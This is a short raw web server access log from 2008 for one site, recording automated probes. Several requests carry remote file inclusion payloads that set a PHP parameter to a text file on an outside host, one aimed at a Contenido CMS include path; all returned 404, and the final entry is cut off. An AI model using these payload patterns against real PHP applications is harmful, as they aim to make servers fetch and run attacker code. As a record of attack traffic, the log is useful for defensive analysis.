74.53.240.146 - - [10/Aug/2008:13:47:01 -0700] "GET /logs/access_080125.log/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:47:24 -0700] "GET /logs/access_080324.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:47:26 -0700] "GET /logs/access_080324.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.10.17.70 - - [10/Aug/2008:13:47:29 -0700]